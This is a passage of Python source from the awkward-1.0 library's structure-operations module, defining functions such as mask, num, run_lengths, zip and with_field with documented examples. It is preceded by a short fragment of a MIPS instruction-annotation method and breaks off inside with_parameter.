    def operands(self) -> Sequence[MIPSOperand]:
        # Only rt and rs are operand references; pos/size are literal args.
        return [self.mipsd.mips_operand(opix) for opix in self.args[:2]]

    def annotation(self, xdata: InstrXData) -> str:
        """xdata format: a:vxx .

        vars[0]: lhs (rt)
        xprs[0]: rhs (rs)
        xprs[1]: rhs (simplified)
        """
        lhs = str(xdata.vars[0])
        rhs = str(xdata.xprs[1])
        return "{0} := insert_bit_field({1}, {2}, {3})".format(
            lhs, rhs, self.args[2], self.args[3])
| 34.89011 | 80 | 0.639055 |
51b83b9655dc2bace81532c3eeba48f09a9fc553 | 176,311 | py | Python | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | src/awkward/operations/structure.py | bmwiedemann/awkward-1.0 | c41ca0ad3542afbb37f98b77200da6e1bd9abaa1 | [
"BSD-3-Clause"
] | null | null | null | # BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import numbers
import json
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import awkward as ak
np = ak.nplike.NumpyMetadata.instance()
@ak._connect._numpy.implements("copy")
def copy(array):
    """
    Returns a deep copy of the array (no memory shared with original).

    This is identical to `np.copy` and `copy.deepcopy`.

    It's only useful to explicitly copy an array if you're going to change it
    in-place. This doesn't come up often because Awkward Arrays are immutable.
    That is to say, the Awkward Array library doesn't have any operations that
    change an array in-place, but the data in the array might be owned by another
    library that can change it in-place.

    For example, if the array comes from NumPy:

        >>> underlying_array = np.array([1.1, 2.2, 3.3, 4.4, 5.5])
        >>> wrapper = ak.Array(underlying_array)
        >>> duplicate = ak.copy(wrapper)
        >>> underlying_array[2] = 123
        >>> underlying_array
        array([  1.1,   2.2, 123. ,   4.4,   5.5])
        >>> wrapper
        <Array [1.1, 2.2, 123, 4.4, 5.5] type='5 * float64'>
        >>> duplicate
        <Array [1.1, 2.2, 3.3, 4.4, 5.5] type='5 * float64'>

    There is an exception to this rule: you can add fields to records in an
    #ak.Array in-place. However, this changes the #ak.Array wrapper without
    affecting the underlying layout data (it *replaces* its layout), so a
    shallow copy will do:

        >>> original = ak.Array([{"x": 1}, {"x": 2}, {"x": 3}])
        >>> shallow_copy = copy.copy(original)
        >>> shallow_copy["y"] = original.x**2
        >>> shallow_copy
        <Array [{x: 1, y: 1}, ... y: 4}, {x: 3, y: 9}] type='3 * {"x": int64, "y": int64}'>
        >>> original
        <Array [{x: 1}, {x: 2}, {x: 3}] type='3 * {"x": int64}'>

    This is key to Awkward Array's efficiency (memory and speed): operations that
    only change part of a structure re-use pieces from the original ("structural
    sharing"). Changing data in-place would result in many surprising long-distance
    changes, so we don't support it. However, an #ak.Array's data might come from
    a mutable third-party library, so this function allows you to make a true copy.
    """
    # Normalize the input to a layout; records are allowed, raw scalars not.
    layout = ak.operations.convert.to_layout(
        array,
        allow_record=True,
        allow_other=False,
    )
    # deep_copy duplicates all underlying buffers; re-wrap with the input's
    # behavior so any custom classes attached to the array are preserved.
    return ak._util.wrap(layout.deep_copy(), ak._util.behaviorof(array))
def mask(array, mask, valid_when=True, highlevel=True, behavior=None):
    """
    Args:
        array: Data to mask, rather than filter.
        mask (array of booleans): The mask that overlays elements in the
            `array` with None. Must have the same length as `array`.
        valid_when (bool): If True, True values in `mask` are considered
            valid (passed from `array` to the output); if False, False
            values in `mask` are considered valid.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns an array for which

        output[i] = array[i] if mask[i] == valid_when else None

    Unlike filtering data with #ak.Array.__getitem__, this `output` has the
    same length as the original `array` and can therefore be used in
    calculations with it, such as
    [universal functions](https://docs.scipy.org/doc/numpy/reference/ufuncs.html).

    For example, with an `array` like

        ak.Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])

    with a boolean selection of `good` elements like

        >>> good = (array % 2 == 1)
        >>> good
        <Array [False, True, False, ... False, True] type='10 * bool'>

    could be used to filter the original `array` (or another with the same
    length).

        >>> array[good]
        <Array [1, 3, 5, 7, 9] type='5 * int64'>

    However, this eliminates information about which elements were dropped and
    where they were. If we instead use #ak.mask,

        >>> ak.mask(array, good)
        <Array [None, 1, None, 3, ... None, 7, None, 9] type='10 * ?int64'>

    this information and the length of the array is preserved, and it can be
    used in further calculations with the original `array` (or another with
    the same length).

        >>> ak.mask(array, good) + array
        <Array [None, 2, None, 6, ... 14, None, 18] type='10 * ?int64'>

    In particular, successive filters can be applied to the same array.

    Even if the `array` and/or the `mask` is nested,

        >>> array = ak.Array([[[0, 1, 2], [], [3, 4], [5]], [[6, 7, 8], [9]]])
        >>> good = (array % 2 == 1)
        >>> good
        <Array [[[False, True, False], ... [True]]] type='2 * var * var * bool'>

    it can still be used with #ak.mask because the `array` and `mask`
    parameters are broadcasted.

        >>> ak.mask(array, good)
        <Array [[[None, 1, None], ... None], [9]]] type='2 * var * var * ?int64'>

    See #ak.broadcast_arrays for details about broadcasting and the generalized
    set of broadcasting rules.

    Another syntax for

        ak.mask(array, array_of_booleans)

    is

        array.mask[array_of_booleans]

    (which is 5 characters away from simply filtering the `array`).
    """

    def getfunction(inputs):
        layoutarray, layoutmask = inputs
        # Act only once broadcasting has reduced the mask to a flat
        # NumpyArray; deeper structures are handled by recursion.
        if isinstance(layoutmask, ak.layout.NumpyArray):
            m = ak.nplike.of(layoutmask).asarray(layoutmask)
            if not issubclass(m.dtype.type, (bool, np.bool_)):
                raise ValueError(
                    "mask must have boolean type, not "
                    "{0}".format(repr(m.dtype)) + ak._util.exception_suffix(__file__)
                )
            # Reinterpret the booleans as int8 to build the byte mask.
            bytemask = ak.layout.Index8(m.view(np.int8))
            return lambda: (
                ak.layout.ByteMaskedArray(
                    bytemask, layoutarray, valid_when=valid_when
                ).simplify(),
            )
        else:
            return None

    layoutarray = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    layoutmask = ak.operations.convert.to_layout(
        mask, allow_record=True, allow_other=False
    )

    behavior = ak._util.behaviorof(array, mask, behavior=behavior)
    # Broadcast array and mask together; right_broadcast=False prevents the
    # mask from being broadcast deeper than its own list structure.
    out = ak._util.broadcast_and_apply(
        [layoutarray, layoutmask],
        getfunction,
        behavior,
        numpy_to_regular=True,
        right_broadcast=False,
        pass_depth=False,
    )
    assert isinstance(out, tuple) and len(out) == 1
    return ak._util.maybe_wrap(out[0], behavior, highlevel)
def num(array, axis=1, highlevel=True, behavior=None):
    """
    Args:
        array: Data containing nested lists to count.
        axis (int): The dimension at which this operation is applied; `0` is
            the outermost dimension and negative values count backward from
            the innermost (`-1`).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns an array of integers specifying the number of elements at a
    particular level. For example,

        >>> array = ak.Array([[[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6]],
        ...                   [],
        ...                   [[7.7], [8.8, 9.9]]])
        >>> ak.num(array, axis=1)
        <Array [4, 0, 2] type='3 * int64'>
        >>> ak.num(array, axis=2)
        <Array [[3, 0, 2, 1], [], [1, 2]] type='3 * var * int64'>

    The `axis=0` case is special: it returns a scalar, the length of the
    array.

    This function is useful for ensuring that slices do not raise errors,
    e.g. selecting the first element only from non-empty lists:

        >>> array[ak.num(array) > 0, 0]
        <Array [[1.1, 2.2, 3.3], [7.7]] type='2 * var * float64'>

    To keep a placeholder (None) in each place we do not want to select,
    consider using #ak.mask instead of #ak.Array.__getitem__.
    """
    # Records are not allowed: counting is defined on list structures only.
    nested = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    counts = nested.num(axis=axis)
    # Wrap with the same behavior as the input when highlevel is requested.
    return ak._util.maybe_wrap_like(counts, array, behavior, highlevel)
def run_lengths(array, highlevel=True, behavior=None):
"""
Args:
array: Data containing runs of numbers to count.
highlevel (bool): If True, return an #ak.Array; otherwise, return
a low-level #ak.layout.Content subclass.
behavior (None or dict): Custom #ak.behavior for the output array, if
high-level.
Computes the lengths of sequences of identical values at the deepest level
of nesting, returning an array with the same structure but with `int64` type.
For example,
>>> array = ak.Array([1.1, 1.1, 1.1, 2.2, 3.3, 3.3, 4.4, 4.4, 5.5])
>>> ak.run_lengths(array)
<Array [3, 1, 2, 2, 1] type='5 * int64'>
There are 3 instances of 1.1, followed by 1 instance of 2.2, 2 instances of 3.3,
2 instances of 4.4, and 1 instance of 5.5.
The order and uniqueness of the input data doesn't matter,
>>> array = ak.Array([1.1, 1.1, 1.1, 5.5, 4.4, 4.4, 1.1, 1.1, 5.5])
>>> ak.run_lengths(array)
<Array [3, 1, 2, 2, 1] type='5 * int64'>
just the difference between each value and its neighbors.
The data can be nested, but runs don't cross list boundaries.
>>> array = ak.Array([[1.1, 1.1, 1.1, 2.2, 3.3], [3.3, 4.4], [4.4, 5.5]])
>>> ak.run_lengths(array)
<Array [[3, 1, 1], [1, 1], [1, 1]] type='3 * var * int64'>
This function recognizes strings as distinguishable values.
>>> array = ak.Array([["one", "one"], ["one", "two", "two"], ["three", "two", "two"]])
>>> ak.run_lengths(array)
<Array [[2], [1, 2], [1, 2]] type='3 * var * int64'>
Note that this can be combined with #ak.argsort and #ak.unflatten to compute
a "group by" operation:
>>> array = ak.Array([{"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}, {"x": 1, "y": 1.1},
... {"x": 3, "y": 3.3}, {"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}])
>>> sorted = array[ak.argsort(array.x)]
>>> sorted.x
<Array [1, 1, 1, 2, 2, 3] type='6 * int64'>
>>> ak.run_lengths(sorted.x)
<Array [3, 2, 1] type='3 * int64'>
>>> ak.unflatten(sorted, ak.run_lengths(sorted.x)).tolist()
[[{'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}, {'x': 2, 'y': 2.2}],
[{'x': 3, 'y': 3.3}]]
Unlike a database "group by," this operation can be applied in bulk to many sublists
(though the run lengths need to be fully flattened to be used as `counts` for
#ak.unflatten, and you need to specify `axis=-1` as the depth).
>>> array = ak.Array([[{"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}, {"x": 1, "y": 1.1}],
... [{"x": 3, "y": 3.3}, {"x": 1, "y": 1.1}, {"x": 2, "y": 2.2}]])
>>> sorted = array[ak.argsort(array.x)]
>>> sorted.x
<Array [[1, 1, 2], [1, 2, 3]] type='2 * var * int64'>
>>> ak.run_lengths(sorted.x)
<Array [[2, 1], [1, 1, 1]] type='2 * var * int64'>
>>> counts = ak.flatten(ak.run_lengths(sorted.x), axis=None)
>>> ak.unflatten(sorted, counts, axis=-1).tolist()
[[[{'x': 1, 'y': 1.1}, {'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}]],
[[{'x': 1, 'y': 1.1}],
[{'x': 2, 'y': 2.2}],
[{'x': 3, 'y': 3.3}]]]
See also #ak.num, #ak.argsort, #ak.unflatten.
"""
nplike = ak.nplike.of(array)
def lengths_of(data, offsets):
if len(data) == 0:
return nplike.empty(0, np.int64), offsets
else:
diffs = data[1:] != data[:-1]
if isinstance(diffs, ak.highlevel.Array):
diffs = nplike.asarray(diffs)
if offsets is not None:
diffs[offsets[1:-1] - 1] = True
positions = nplike.nonzero(diffs)[0]
full_positions = nplike.empty(len(positions) + 2, np.int64)
full_positions[0] = 0
full_positions[-1] = len(data)
full_positions[1:-1] = positions + 1
nextcontent = full_positions[1:] - full_positions[:-1]
if offsets is None:
nextoffsets = None
else:
nextoffsets = nplike.searchsorted(full_positions, offsets, side="left")
return nextcontent, nextoffsets
def getfunction(layout):
if layout.branch_depth == (False, 1):
if isinstance(layout, ak._util.indexedtypes):
layout = layout.project()
if (
layout.parameter("__array__") == "string"
or layout.parameter("__array__") == "bytestring"
):
nextcontent, _ = lengths_of(ak.highlevel.Array(layout), None)
return lambda: ak.layout.NumpyArray(nextcontent)
if not isinstance(layout, (ak.layout.NumpyArray, ak.layout.EmptyArray)):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ ak._util.exception_suffix(__file__)
)
nextcontent, _ = lengths_of(nplike.asarray(layout), None)
return lambda: ak.layout.NumpyArray(nextcontent)
elif layout.branch_depth == (False, 2):
if isinstance(layout, ak._util.indexedtypes):
layout = layout.project()
if not isinstance(layout, ak._util.listtypes):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ ak._util.exception_suffix(__file__)
)
if (
layout.content.parameter("__array__") == "string"
or layout.content.parameter("__array__") == "bytestring"
):
listoffsetarray = layout.toListOffsetArray64(False)
offsets = nplike.asarray(listoffsetarray.offsets)
content = listoffsetarray.content[offsets[0] : offsets[-1]]
if isinstance(content, ak._util.indexedtypes):
content = content.project()
nextcontent, nextoffsets = lengths_of(
ak.highlevel.Array(content), offsets - offsets[0]
)
return lambda: ak.layout.ListOffsetArray64(
ak.layout.Index64(nextoffsets), ak.layout.NumpyArray(nextcontent)
)
listoffsetarray = layout.toListOffsetArray64(False)
offsets = nplike.asarray(listoffsetarray.offsets)
content = listoffsetarray.content[offsets[0] : offsets[-1]]
if isinstance(content, ak._util.indexedtypes):
content = content.project()
if not isinstance(content, (ak.layout.NumpyArray, ak.layout.EmptyArray)):
raise NotImplementedError(
"run_lengths on "
+ type(layout).__name__
+ " with content "
+ type(content).__name__
+ ak._util.exception_suffix(__file__)
)
nextcontent, nextoffsets = lengths_of(
nplike.asarray(content), offsets - offsets[0]
)
return lambda: ak.layout.ListOffsetArray64(
ak.layout.Index64(nextoffsets), ak.layout.NumpyArray(nextcontent)
)
else:
return None
layout = ak.operations.convert.to_layout(
array, allow_record=False, allow_other=False
)
if isinstance(layout, ak.partition.PartitionedArray):
if len(layout.partitions) != 0 and layout.partitions[0].branch_depth == (
False,
1,
):
out = ak._util.recursively_apply(
layout.toContent(),
getfunction,
pass_depth=False,
pass_user=False,
)
else:
outparts = []
for part in layout.partitions:
outparts.append(
ak._util.recursively_apply(
part,
getfunction,
pass_depth=False,
pass_user=False,
)
)
out = ak.partition.IrregularlyPartitionedArray(outparts)
else:
out = ak._util.recursively_apply(
layout,
getfunction,
pass_depth=False,
pass_user=False,
)
return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def zip(
    arrays,
    depth_limit=None,
    parameters=None,
    with_name=None,
    highlevel=True,
    behavior=None,
    right_broadcast=False,
):
    """
    Args:
        arrays (dict or iterable of arrays): Arrays to combine into a
            record-containing structure (if a dict) or a tuple-containing
            structure (if any other kind of iterable).
        depth_limit (None or int): If None, attempt to fully broadcast the
            `array` to all levels. If an int, limit the number of dimensions
            that get broadcasted. The minimum value is `1`, for no
            broadcasting.
        parameters (None or dict): Parameters for the new
            #ak.layout.RecordArray node that is created by this operation.
        with_name (None or str): Assigns a `"__record__"` name to the new
            #ak.layout.RecordArray node that is created by this operation
            (overriding `parameters`, if necessary).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
        right_broadcast (bool): If True, follow rules for implicit
            right-broadcasting, as described in #ak.broadcast_arrays.

    Combines `arrays` into a single structure as the fields of a collection
    of records or the slots of a collection of tuples. If the `arrays` have
    nested structure, they are broadcasted with one another to form the
    records or tuples as deeply as possible, though this can be limited by
    `depth_limit`.

    This operation may be thought of as the opposite of projection in
    #ak.Array.__getitem__, which extracts fields one at a time, or
    #ak.unzip, which extracts them all in one call.

    Consider the following arrays, `one` and `two`.

        >>> one = ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5], [6.6]])
        >>> two = ak.Array([["a", "b", "c"], [], ["d", "e"], ["f"]])

    Zipping them together using a dict creates a collection of records with
    the same nesting structure as `one` and `two`.

        >>> ak.to_list(ak.zip({"x": one, "y": two}))
        [
         [{'x': 1.1, 'y': 'a'}, {'x': 2.2, 'y': 'b'}, {'x': 3.3, 'y': 'c'}],
         [],
         [{'x': 4.4, 'y': 'd'}, {'x': 5.5, 'y': 'e'}],
         [{'x': 6.6, 'y': 'f'}]
        ]

    Doing so with a list creates tuples, whose fields are not named.

        >>> ak.to_list(ak.zip([one, two]))
        [
         [(1.1, 'a'), (2.2, 'b'), (3.3, 'c')],
         [],
         [(4.4, 'd'), (5.5, 'e')],
         [(6.6, 'f')]
        ]

    Adding a third array with the same length as `one` and `two` but less
    internal structure is okay: it gets broadcasted to match the others.
    (See #ak.broadcast_arrays for broadcasting rules.)

        >>> three = ak.Array([100, 200, 300, 400])
        >>> ak.to_list(ak.zip([one, two, three]))
        [
         [(1.1, 'a', 100), (2.2, 'b', 100), (3.3, 'c', 100)],
         [],
         [(4.4, 'd', 300), (5.5, 'e', 300)],
         [(6.6, 'f', 400)]
        ]

    However, if arrays have the same depth but different lengths of nested
    lists, attempting to zip them together is a broadcasting error.

        >>> one = ak.Array([[[1, 2, 3], [], [4, 5], [6]], [], [[7, 8]]])
        >>> two = ak.Array([[[1.1, 2.2], [3.3], [4.4], [5.5]], [], [[6.6]]])
        >>> ak.zip([one, two])
        ValueError: in ListArray64, cannot broadcast nested list

    For this, one can set the `depth_limit` to prevent the operation from
    attempting to broadcast what can't be broadcasted.

        >>> ak.to_list(ak.zip([one, two], depth_limit=1))
        [([[1, 2, 3], [], [4, 5], [6]], [[1.1, 2.2], [3.3], [4.4], [5.5]]),
         ([], []),
         ([[7, 8]], [[6.6]])]

    As an extreme, `depth_limit=1` is a handy way to make a record structure
    at the outermost level, regardless of whether the fields have matching
    structure or not.
    """
    if depth_limit is not None and depth_limit <= 0:
        raise ValueError(
            "depth_limit must be None or at least 1"
            + ak._util.exception_suffix(__file__)
        )

    def _to_layout(x):
        # Convert one input to a layout.  Scalars (which to_layout rejects
        # with TypeError) are wrapped in a length-1 list so they can still
        # broadcast against the other inputs; the flag records that this
        # happened so a single Record can be returned if *all* inputs were
        # scalars.  Returns (layout, is_scalar).
        try:
            return (
                ak.operations.convert.to_layout(
                    x, allow_record=False, allow_other=False
                ),
                False,
            )
        except TypeError:
            return (
                ak.operations.convert.to_layout(
                    [x], allow_record=False, allow_other=False
                ),
                True,
            )

    if isinstance(arrays, dict):
        # dict input -> named record fields; keys() and values() are
        # guaranteed to iterate in matching order.
        behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
        recordlookup = list(arrays.keys())
        values = list(arrays.values())
    else:
        # any other iterable -> unnamed tuple slots
        behavior = ak._util.behaviorof(*arrays, behavior=behavior)
        recordlookup = None
        values = list(arrays)

    layouts = []
    num_scalars = 0
    for x in values:
        layout, is_scalar = _to_layout(x)
        layouts.append(layout)
        if is_scalar:
            num_scalars += 1

    # If every input was a scalar, the result is a single Record, not an array.
    to_record = num_scalars == len(values)

    if with_name is not None:
        if parameters is None:
            parameters = {}
        else:
            parameters = dict(parameters)  # don't mutate the caller's dict
        parameters["__record__"] = with_name

    def getfunction(inputs, depth):
        # Stop descending when the depth limit is reached, or (with no limit)
        # when every input has bottomed out; strings, bytestrings, and
        # categoricals count as leaves even though they are depth-2 layouts.
        if depth_limit == depth or (
            depth_limit is None
            and all(
                x.purelist_depth == 1
                or (
                    x.purelist_depth == 2
                    and x.purelist_parameter("__array__")
                    in ("string", "bytestring", "categorical")
                )
                for x in inputs
            )
        ):
            return lambda: (
                ak.layout.RecordArray(inputs, recordlookup, parameters=parameters),
            )
        else:
            return None

    out = ak._util.broadcast_and_apply(
        layouts,
        getfunction,
        behavior,
        right_broadcast=right_broadcast,
        pass_depth=True,
    )
    assert isinstance(out, tuple) and len(out) == 1
    out = out[0]

    if to_record:
        out = out[0]
        assert isinstance(out, ak.layout.Record)

    return ak._util.maybe_wrap(out, behavior, highlevel)
def unzip(array):
    """
    Splits an array of records or tuples into a Python tuple of arrays,
    one per field. An `array` without records or tuples is returned
    unchanged inside a length-1 Python tuple.

    For example,

        >>> array = ak.Array([{"x": 1.1, "y": [1]},
        ...                   {"x": 2.2, "y": [2, 2]},
        ...                   {"x": 3.3, "y": [3, 3, 3]}])
        >>> x, y = ak.unzip(array)
        >>> x
        <Array [1.1, 2.2, 3.3] type='3 * float64'>
        >>> y
        <Array [[1], [2, 2], [3, 3, 3]] type='3 * var * int64'>
    """
    field_names = ak.operations.describe.fields(array)
    if not field_names:
        # no records/tuples anywhere: hand the array back as a 1-tuple
        return (array,)
    return tuple(array[name] for name in field_names)
def to_regular(array, axis=1, highlevel=True, behavior=None):
    """
    Args:
        array: Array to convert.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Converts a variable-length axis into a regular one, if possible.

        >>> irregular = ak.from_iter(np.arange(2*3*5).reshape(2, 3, 5))
        >>> ak.type(irregular)
        2 * var * var * int64
        >>> ak.type(ak.to_regular(irregular))
        2 * 3 * var * int64
        >>> ak.type(ak.to_regular(irregular, axis=2))
        2 * var * 5 * int64
        >>> ak.type(ak.to_regular(irregular, axis=-1))
        2 * var * 5 * int64

    But truly irregular data cannot be converted.

        >>> ak.to_regular(ak.Array([[1, 2, 3], [], [4, 5]]))
        ValueError: in ListOffsetArray64, cannot convert to RegularArray because
        subarray lengths are not regular

    See also #ak.from_regular.
    """

    def regularize(layout, depth, posaxis):
        # resolve negative axis values relative to this node
        posaxis = layout.axis_wrap_if_negative(posaxis)
        if posaxis == depth and isinstance(layout, ak.layout.RegularArray):
            return lambda: layout  # already regular; keep as-is
        if posaxis == depth and isinstance(layout, ak._util.listtypes):
            return lambda: layout.toRegularArray()
        if posaxis == 0:
            raise ValueError(
                "array has no axis {0}".format(axis)
                + ak._util.exception_suffix(__file__)
            )
        # keep descending, carrying the (possibly resolved) axis along
        return posaxis

    result = ak.operations.convert.to_layout(array)
    if axis != 0:
        result = ak._util.recursively_apply(
            result,
            regularize,
            pass_depth=True,
            pass_user=True,
            user=axis,
            numpy_to_regular=True,
        )
    return ak._util.maybe_wrap_like(result, array, behavior, highlevel)
def from_regular(array, axis=1, highlevel=True, behavior=None):
    """
    Args:
        array: Array to convert.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Converts a regular axis into an irregular one.

        >>> regular = ak.Array(np.arange(2*3*5).reshape(2, 3, 5))
        >>> ak.type(regular)
        2 * 3 * 5 * int64
        >>> ak.type(ak.from_regular(regular))
        2 * var * 5 * int64
        >>> ak.type(ak.from_regular(regular, axis=2))
        2 * 3 * var * int64
        >>> ak.type(ak.from_regular(regular, axis=-1))
        2 * 3 * var * int64

    See also #ak.to_regular.
    """

    def irregularize(layout, depth, posaxis):
        # resolve negative axis values relative to this node
        posaxis = layout.axis_wrap_if_negative(posaxis)
        if posaxis == depth and isinstance(layout, ak.layout.RegularArray):
            return lambda: layout.toListOffsetArray64(False)
        if posaxis == depth and isinstance(layout, ak._util.listtypes):
            return lambda: layout  # already variable-length; keep as-is
        if posaxis == 0:
            raise ValueError(
                "array has no axis {0}".format(axis)
                + ak._util.exception_suffix(__file__)
            )
        # keep descending, carrying the (possibly resolved) axis along
        return posaxis

    result = ak.operations.convert.to_layout(array)
    if axis != 0:
        result = ak._util.recursively_apply(
            result,
            irregularize,
            pass_depth=True,
            pass_user=True,
            user=axis,
            numpy_to_regular=True,
        )
    return ak._util.maybe_wrap_like(result, array, behavior, highlevel)
def with_name(array, name, highlevel=True, behavior=None):
    """
    Args:
        array: Data containing records or tuples.
        name (str): Name to give to the records or tuples; this assigns
            the `"__record__"` parameter.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns an #ak.Array or #ak.Record (or low-level equivalent, if
    `highlevel=False`) with a new name. This function does not change the
    array in-place.

    The records or tuples may be nested within multiple levels of nested lists.
    If records are nested within records, only the outermost are affected.

    Setting the `"__record__"` parameter makes it possible to add behaviors
    to the data; see #ak.Array and #ak.behavior for a more complete
    description.
    """

    def attach_name(layout):
        if not isinstance(layout, ak.layout.RecordArray):
            return None
        new_parameters = dict(layout.parameters)
        new_parameters["__record__"] = name
        return lambda: ak.layout.RecordArray(
            layout.contents,
            layout.recordlookup,
            len(layout),
            layout.identities,
            new_parameters,
        )

    renamed = ak._util.recursively_apply(
        ak.operations.convert.to_layout(array), attach_name, pass_depth=False
    )

    def collapse_unions(layout):
        # renaming may make union branches mergeable; simplify them
        if isinstance(layout, ak._util.uniontypes):
            return lambda: layout.simplify(merge=True, mergebool=False)
        return None

    simplified = ak._util.recursively_apply(
        renamed, collapse_unions, pass_depth=False
    )
    return ak._util.maybe_wrap_like(simplified, array, behavior, highlevel)
def with_field(base, what, where=None, highlevel=True, behavior=None):
    """
    Args:
        base: Data containing records or tuples.
        what: Data to add as a new field.
        where (None or str or non-empty iterable of str): If None, the new field
            has no name (can be accessed as an integer slot number in a
            string); If str, the name of the new field. If iterable, it is
            interpreted as a path where to add the field in a nested record.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns an #ak.Array or #ak.Record (or low-level equivalent, if
    `highlevel=False`) with a new field attached. This function does not
    change the array in-place.

    See #ak.Array.__setitem__ and #ak.Record.__setitem__ for a variant that
    changes the high-level object in-place. (These methods internally use
    #ak.with_field, so performance is not a factor in choosing one over the
    other.)
    """
    # Touch the caches of high-level inputs (intentionally unused binding).
    if isinstance(what, (ak.highlevel.Array, ak.highlevel.Record)):
        what_caches = what.caches  # noqa: F841
    # `where` must be None, a field name, or an iterable of field names (a path).
    if not (
        where is None
        or isinstance(where, str)
        or (isinstance(where, Iterable) and all(isinstance(x, str) for x in where))
    ):
        raise TypeError(
            "New fields may only be assigned by field name(s) "
            "or as a new integer slot by passing None for 'where'"
            + ak._util.exception_suffix(__file__)
        )
    # A multi-element path: recurse one level at a time — set the tail of the
    # path inside base[where[0]], then re-attach that subrecord under where[0].
    if (
        not isinstance(where, str)
        and isinstance(where, Iterable)
        and all(isinstance(x, str) for x in where)
        and len(where) > 1
    ):
        return with_field(
            base,
            with_field(
                base[where[0]],
                what,
                where=where[1:],
                highlevel=highlevel,
                behavior=behavior,
            ),
            where=where[0],
            highlevel=highlevel,
            behavior=behavior,
        )
    else:
        # A single-element path is equivalent to a plain field name.
        if not (isinstance(where, str) or where is None):
            where = where[0]
        behavior = ak._util.behaviorof(base, what, behavior=behavior)
        base = ak.operations.convert.to_layout(
            base, allow_record=True, allow_other=False
        )
        # numfields is negative when the layout contains no records/tuples.
        if base.numfields < 0:
            raise ValueError(
                "no tuples or records in array; cannot add a new field"
                + ak._util.exception_suffix(__file__)
            )
        # `what` may be a layout, a record, or a scalar (allow_other=True).
        what = ak.operations.convert.to_layout(
            what, allow_record=True, allow_other=True
        )
        # If `where` already exists, it is replaced: drop it from the kept keys.
        keys = base.keys()
        if where in base.keys():
            keys.remove(where)
        if len(keys) == 0:
            # the only key was removed, so just create new Record
            out = (ak.layout.RecordArray([what], [where], parameters=base.parameters),)
        else:
            def getfunction(inputs):
                nplike = ak.nplike.of(*inputs)
                base, what = inputs
                if isinstance(base, ak.layout.RecordArray):
                    # None becomes an all-missing option-type field.
                    if what is None:
                        what = ak.layout.IndexedOptionArray64(
                            ak.layout.Index64(nplike.full(len(base), -1, np.int64)),
                            ak.layout.EmptyArray(),
                        )
                    # A scalar is repeated to match the record count.
                    elif not isinstance(what, ak.layout.Content):
                        what = ak.layout.NumpyArray(nplike.repeat(what, len(base)))
                    # Choose the field-name list: tuples stay tuples only when
                    # `where` is None; otherwise names are materialized.
                    if base.istuple and where is None:
                        recordlookup = None
                    elif base.istuple:
                        recordlookup = keys + [where]
                    elif where is None:
                        recordlookup = keys + [str(len(keys))]
                    else:
                        recordlookup = keys + [where]
                    out = ak.layout.RecordArray(
                        [base[k] for k in keys] + [what],
                        recordlookup,
                        parameters=base.parameters,
                    )
                    return lambda: (out,)
                else:
                    return None
            # Broadcast `what` against `base` so the new field matches the
            # records' nesting structure.
            out = ak._util.broadcast_and_apply(
                [base, what],
                getfunction,
                behavior,
                right_broadcast=False,
                pass_depth=False,
            )
        assert isinstance(out, tuple) and len(out) == 1
        return ak._util.maybe_wrap(out[0], behavior, highlevel)
def with_parameter(array, parameter, value, highlevel=True, behavior=None):
    """
    Args:
        array: Data convertible into an Awkward Array.
        parameter (str): Name of the parameter to set on that array.
        value (JSON): Value of the parameter to set on that array.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns a new array with `parameter` set to `value` on the outermost
    node of its #ak.Array.layout. The "new array" is a lightweight shallow
    copy; large data buffers are not duplicated.

    Setting a parameter to None removes it, so this function can also be
    used to delete a single parameter.
    """
    converted = ak.operations.convert.to_layout(
        array, allow_record=True, allow_other=False
    )
    if isinstance(converted, ak.partition.PartitionedArray):
